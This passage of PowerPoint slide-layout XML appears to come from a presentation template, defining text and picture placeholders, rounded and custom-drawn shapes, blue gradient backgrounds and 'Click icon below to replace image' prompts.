          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600058" y="3599180"/>
            <a:ext cx="4527528"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
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5A6916B-7D1F-B90D-88A7-91B5EA38AFBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5810250" y="1275174"/>
            <a:ext cx="6026150" cy="4444176"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4775"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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lvl1pPr algn="ctr">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Third level</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Fourth level</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Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4224282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Text + Image 2">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A6916B-7D1F-B90D-88A7-91B5EA38AFBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4791919" y="1237602"/>
            <a:ext cx="7044481" cy="4519320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4775"/>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lvl1pPr>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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="932742">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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8" y="2343603"/>
            <a:ext cx="3636275" cy="1003352"/>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5" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7F59AA4-E616-8510-AAB5-12D71B9D7D93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600058" y="3599180"/>
            <a:ext cx="3636276"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
        <p:nvSpPr>
          <p:cNvPr id="9" name="Picture Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C633A4AD-D5F4-E3CF-0D3D-6319DC692C51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4791919" y="1237602"/>
            <a:ext cx="7044481" cy="3541332"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 212209 w 6026150"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3388901"/>
              <a:gd name="connsiteX1" fmla="*/ 5813941 w 6026150"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 3388901"/>
              <a:gd name="connsiteX2" fmla="*/ 6026150 w 6026150"/>
              <a:gd name="connsiteY2" fmla="*/ 212209 h 3388901"/>
              <a:gd name="connsiteX3" fmla="*/ 6026150 w 6026150"/>
              <a:gd name="connsiteY3" fmla="*/ 3388901 h 3388901"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 6026150"/>
              <a:gd name="connsiteY4" fmla="*/ 3388901 h 3388901"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 6026150"/>
              <a:gd name="connsiteY5" fmla="*/ 212209 h 3388901"/>
              <a:gd name="connsiteX6" fmla="*/ 212209 w 6026150"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 338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150" h="3388901">
                <a:moveTo>
                  <a:pt x="212209" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5813941" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5931141" y="0"/>
                  <a:pt x="6026150" y="95009"/>
                  <a:pt x="6026150" y="212209"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6026150" y="3388901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3388901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="212209"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="95009"/>
                  <a:pt x="95009" y="0"/>
                  <a:pt x="212209" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" bIns="155448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stStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click icon below </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to replace image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CF6FF9C-A7FC-8206-1B7E-6B8D9B8C8C8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5127585" y="5031159"/>
            <a:ext cx="6539695" cy="466446"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6341327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Text + Medium Content">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F93193D3-9042-8981-7436-D3F8E7000189}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4791918" y="1237603"/>
            <a:ext cx="7044482" cy="4519320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4775"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="19050">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1463040" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="233149" lvl="0" indent="-233149" algn="ctr" defTabSz="932742">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzTx/>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8" y="2343603"/>
            <a:ext cx="3636275" cy="1003352"/>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5" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7F59AA4-E616-8510-AAB5-12D71B9D7D93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600058" y="3599180"/>
            <a:ext cx="3636276"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11916496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Medium image">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3548336-FD29-7575-80B0-FD896B6475E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4791919" y="1237603"/>
            <a:ext cx="7044481" cy="4519320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4097"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="19050">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1097280" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>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cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" defTabSz="932742">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click icon below to replace image</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995587"/>
            <a:ext cx="3231162" cy="1003352"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"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542250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Larg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A6916B-7D1F-B90D-88A7-91B5EA38AFBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3831221" y="647858"/>
            <a:ext cx="8005179" cy="5248849"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4775"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="19050">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1463040" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="233149" lvl="0" indent="-233149" algn="ctr" defTabSz="932742">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzTx/>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744750"/>
            <a:ext cx="2687151" cy="1505027"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"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7833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ption 3">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="1978CF"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Picture 45" descr="A couple of men standing in front of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA0B64D7-A9AE-534C-1551-D7DDFE680B7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67008" y="0"/>
            <a:ext cx="6769468" cy="6994525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 6637020 w 6637335"/>
              <a:gd name="connsiteY0" fmla="*/ 6362701 h 6857999"/>
              <a:gd name="connsiteX1" fmla="*/ 6637020 w 6637335"/>
              <a:gd name="connsiteY1" fmla="*/ 6857999 h 6857999"/>
              <a:gd name="connsiteX2" fmla="*/ 6400801 w 6637335"/>
              <a:gd name="connsiteY2" fmla="*/ 6857999 h 6857999"/>
              <a:gd name="connsiteX3" fmla="*/ 6637020 w 6637335"/>
              <a:gd name="connsiteY3" fmla="*/ 3012441 h 6857999"/>
              <a:gd name="connsiteX4" fmla="*/ 6637020 w 6637335"/>
              <a:gd name="connsiteY4" fmla="*/ 5819141 h 6857999"/>
              <a:gd name="connsiteX5" fmla="*/ 6141719 w 6637335"/>
              <a:gd name="connsiteY5" fmla="*/ 6857999 h 6857999"/>
              <a:gd name="connsiteX6" fmla="*/ 4800600 w 6637335"/>
              <a:gd name="connsiteY6" fmla="*/ 6857999 h 6857999"/>
              <a:gd name="connsiteX7" fmla="*/ 6637335 w 6637335"/>
              <a:gd name="connsiteY7" fmla="*/ 1140606 h 6857999"/>
              <a:gd name="connsiteX8" fmla="*/ 6637335 w 6637335"/>
              <a:gd name="connsiteY8" fmla="*/ 2472144 h 6857999"/>
              <a:gd name="connsiteX9" fmla="*/ 4540248 w 6637335"/>
              <a:gd name="connsiteY9" fmla="*/ 6857999 h 6857999"/>
              <a:gd name="connsiteX10" fmla="*/ 3200399 w 6637335"/>
              <a:gd name="connsiteY10" fmla="*/ 6857999 h 6857999"/>
              <a:gd name="connsiteX11" fmla="*/ 5601970 w 6637335"/>
              <a:gd name="connsiteY11" fmla="*/ 1831340 h 6857999"/>
              <a:gd name="connsiteX12" fmla="*/ 6477026 w 6637335"/>
              <a:gd name="connsiteY12" fmla="*/ 1165146 h 6857999"/>
              <a:gd name="connsiteX13" fmla="*/ 3620770 w 6637335"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 6857999"/>
              <a:gd name="connsiteX14" fmla="*/ 4695189 w 6637335"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 6857999"/>
              <a:gd name="connsiteX15" fmla="*/ 4737100 w 6637335"/>
              <a:gd name="connsiteY15" fmla="*/ 19050 h 6857999"/>
              <a:gd name="connsiteX16" fmla="*/ 5378449 w 6637335"/>
              <a:gd name="connsiteY16" fmla="*/ 1725929 h 6857999"/>
              <a:gd name="connsiteX17" fmla="*/ 2926079 w 6637335"/>
              <a:gd name="connsiteY17" fmla="*/ 6857999 h 6857999"/>
              <a:gd name="connsiteX18" fmla="*/ 1696719 w 6637335"/>
              <a:gd name="connsiteY18" fmla="*/ 6857999 h 6857999"/>
              <a:gd name="connsiteX19" fmla="*/ 1708467 w 6637335"/>
              <a:gd name="connsiteY19" fmla="*/ 6746142 h 6857999"/>
              <a:gd name="connsiteX20" fmla="*/ 1808480 w 6637335"/>
              <a:gd name="connsiteY20" fmla="*/ 6419851 h 6857999"/>
              <a:gd name="connsiteX21" fmla="*/ 4297678 w 6637335"/>
              <a:gd name="connsiteY21" fmla="*/ 1209039 h 6857999"/>
              <a:gd name="connsiteX22" fmla="*/ 4269740 w 6637335"/>
              <a:gd name="connsiteY22" fmla="*/ 995680 h 6857999"/>
              <a:gd name="connsiteX23" fmla="*/ 4086860 w 6637335"/>
              <a:gd name="connsiteY23" fmla="*/ 1108710 h 6857999"/>
              <a:gd name="connsiteX24" fmla="*/ 1341120 w 6637335"/>
              <a:gd name="connsiteY24" fmla="*/ 6857999 h 6857999"/>
              <a:gd name="connsiteX25" fmla="*/ 0 w 6637335"/>
              <a:gd name="connsiteY25" fmla="*/ 6857999 h 6857999"/>
              <a:gd name="connsiteX26" fmla="*/ 2995928 w 6637335"/>
              <a:gd name="connsiteY26" fmla="*/ 586740 h 6857999"/>
              <a:gd name="connsiteX27" fmla="*/ 3620770 w 6637335"/>
              <a:gd name="connsiteY2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37335" h="6857999">
                <a:moveTo>
                  <a:pt x="6637020" y="6362701"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6637020" y="6857999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6400801" y="6857999"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6637020" y="3012441"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6637020" y="5819141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6141719" y="6857999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4800600" y="6857999"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6637335" y="1140606"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6637335" y="2472144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4540248" y="6857999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3200399" y="6857999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5601970" y="1831340"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5771989" y="1475741"/>
                  <a:pt x="6105366" y="1244601"/>
                  <a:pt x="6477026" y="1165146"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3620770" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4695189" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4709160" y="6350"/>
                  <a:pt x="4723130" y="12700"/>
                  <a:pt x="4737100" y="19050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5365749" y="320040"/>
                  <a:pt x="5678169" y="1097280"/>
                  <a:pt x="5378449" y="1725929"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2926079" y="6857999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1696719" y="6857999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1708467" y="6746142"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1725374" y="6634878"/>
                  <a:pt x="1757997" y="6525579"/>
                  <a:pt x="1808480" y="6419851"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4297678" y="1209039"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4340860" y="1118871"/>
                  <a:pt x="4359910" y="1038860"/>
                  <a:pt x="4269740" y="995680"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4180840" y="953771"/>
                  <a:pt x="4130040" y="1018539"/>
                  <a:pt x="4086860" y="1108710"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1341120" y="6857999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6857999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2995928" y="586740"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3125469" y="313690"/>
                  <a:pt x="3354068" y="114300"/>
                  <a:pt x="3620770" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" dist="127000" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="454142">
                <a:alpha val="20000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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4"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4"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8926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744750"/>
            <a:ext cx="2652427" cy="1505027"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"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8" name="Picture Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B69C4183-DE9B-AAD0-F8BE-7B3E9F0B2408}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3831221" y="647858"/>
            <a:ext cx="8005179" cy="5248849"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4097"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="19050">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1097280" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>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cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="233149" lvl="0" indent="-233149" defTabSz="932742">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click icon below to replace image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2681379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720967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575445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5964103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721190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75702"/>
            <a:ext cx="11239464" cy="50231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385464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914887"/>
            <a:ext cx="11239464" cy="50231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164805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0231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155154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0231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53028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0231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336577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ption 4">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="1978CF"/>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77" name="Graphic 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5BAA2F1-2B9B-8798-77BC-735DAE1C8C23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5576662" y="0"/>
            <a:ext cx="6859814" cy="6994525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 2980594 w 2980593"/>
              <a:gd name="connsiteY0" fmla="*/ 3039125 h 3039125"/>
              <a:gd name="connsiteX1" fmla="*/ 1669268 w 2980593"/>
              <a:gd name="connsiteY1" fmla="*/ 3039125 h 3039125"/>
              <a:gd name="connsiteX2" fmla="*/ 2304107 w 2980593"/>
              <a:gd name="connsiteY2" fmla="*/ 639905 h 3039125"/>
              <a:gd name="connsiteX3" fmla="*/ 2608020 w 2980593"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 3039125"/>
              <a:gd name="connsiteX4" fmla="*/ 2980594 w 2980593"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 3039125"/>
              <a:gd name="connsiteX5" fmla="*/ 2980594 w 2980593"/>
              <a:gd name="connsiteY5" fmla="*/ 3039125 h 3039125"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 2980593"/>
              <a:gd name="connsiteY6" fmla="*/ 3039125 h 3039125"/>
              <a:gd name="connsiteX7" fmla="*/ 1461031 w 2980593"/>
              <a:gd name="connsiteY7" fmla="*/ 3039125 h 3039125"/>
              <a:gd name="connsiteX8" fmla="*/ 2109941 w 2980593"/>
              <a:gd name="connsiteY8" fmla="*/ 655663 h 3039125"/>
              <a:gd name="connsiteX9" fmla="*/ 2156090 w 2980593"/>
              <a:gd name="connsiteY9" fmla="*/ 0 h 3039125"/>
              <a:gd name="connsiteX10" fmla="*/ 683240 w 2980593"/>
              <a:gd name="connsiteY10" fmla="*/ 0 h 3039125"/>
              <a:gd name="connsiteX11" fmla="*/ 744586 w 2980593"/>
              <a:gd name="connsiteY11" fmla="*/ 294345 h 3039125"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 2980593"/>
              <a:gd name="connsiteY12" fmla="*/ 3039125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593" h="3039125">
                <a:moveTo>
                  <a:pt x="2980594" y="3039125"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1669268" y="3039125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2304107" y="639905"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2367704" y="399589"/>
                  <a:pt x="2472385" y="182910"/>
                  <a:pt x="2608020" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2980594" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2980594" y="3039125"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="0" y="3039125"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1461031" y="3039125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2109941" y="655663"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2161718" y="458120"/>
                  <a:pt x="2175789" y="191915"/>
                  <a:pt x="2156090" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="683240" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="740646" y="57406"/>
                  <a:pt x="766535" y="210488"/>
                  <a:pt x="744586" y="294345"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="3039125"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>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246826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915179"/>
            <a:ext cx="11239464" cy="50231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19970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915178"/>
            <a:ext cx="11239464" cy="50231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504711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915179"/>
            <a:ext cx="11239464" cy="50231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756470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915179"/>
            <a:ext cx="11239464" cy="50231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31431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18416"/>
            <a:ext cx="11239464" cy="50231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821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12342"/>
            <a:ext cx="11239464" cy="50231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08021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12342"/>
            <a:ext cx="11239464" cy="50231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964517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44485"/>
            <a:ext cx="3245833" cy="50231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755483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gradFill>
          <a:gsLst>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="0">
              <a:srgbClr val="1978CF"/>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4251" y="597450"/>
            <a:ext cx="8187930" cy="3004681"/>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654251" y="405649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654251" y="447098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60214" y="1201045"/>
            <a:ext cx="2565090" cy="2296217"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1806607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ction Title blue">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="0">
              <a:srgbClr val="1978CF"/>
            </a:gs>
          </a:gsLst>
